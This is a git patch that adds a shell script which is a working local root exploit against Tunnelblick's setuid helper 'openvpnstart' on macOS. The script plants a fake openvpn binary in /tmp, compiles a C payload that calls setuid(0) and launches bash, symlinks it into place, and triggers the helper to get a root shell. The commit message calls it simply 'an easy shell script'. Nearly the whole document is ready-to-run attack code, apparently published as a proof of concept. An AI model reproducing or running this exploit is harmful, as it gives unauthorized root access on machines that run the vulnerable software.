From 059cdebb2d51944881dd24e862f9e40b249ee0a6 Mon Sep 17 00:00:00 2001
From: "Jason A. Donenfeld" <Jason@zx2c4.com>
Date: Sat, 11 Aug 2012 17:00:56 +0200
Subject: An easy shell script.

---
 pwnnel-blicker-for-kids.sh | 28 ++++++++++++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100755 pwnnel-blicker-for-kids.sh

diff --git a/pwnnel-blicker-for-kids.sh b/pwnnel-blicker-for-kids.sh
new file mode 100755
index 0000000..bc1a336
--- /dev/null
+++ b/pwnnel-blicker-for-kids.sh
@@ -0,0 +1,28 @@
+#!/bin/sh
+echo "[+] Making vulnerable directory."
+mkdir -pv /tmp/pwn/openvpn/openvpn-0
+
+echo "[+] Preparing payload."
+cat > /tmp/pwn/backdoor.c <<_EOF
+#include <unistd.h>
+#include <sys/stat.h>
+#include <stdio.h>
+
+int main()
+{
+	printf("[+] Cleaning up.\n");
+	system("rm -rfv /tmp/pwn");
+	printf("[+] Getting root.\n");
+	setuid(0);
+	setgid(0);
+	execl("/bin/bash", "bash", NULL);
+}
+_EOF
+gcc -o /tmp/pwn/root /tmp/pwn/backdoor.c
+
+echo "[+] Creating symlinks."
+ln -s -v -f /tmp/pwn/root /tmp/pwn/openvpn/openvpn-0/openvpn
+ln -s -v -f /Applications/Tunnelblick.app/Contents/Resources/openvpnstart /tmp/pwn/start
+
+echo "[+] Triggering vulnerable program."
+exec /tmp/pwn/start OpenVPNInfo 0
-- 
cgit v1.2.3-59-g8ed1b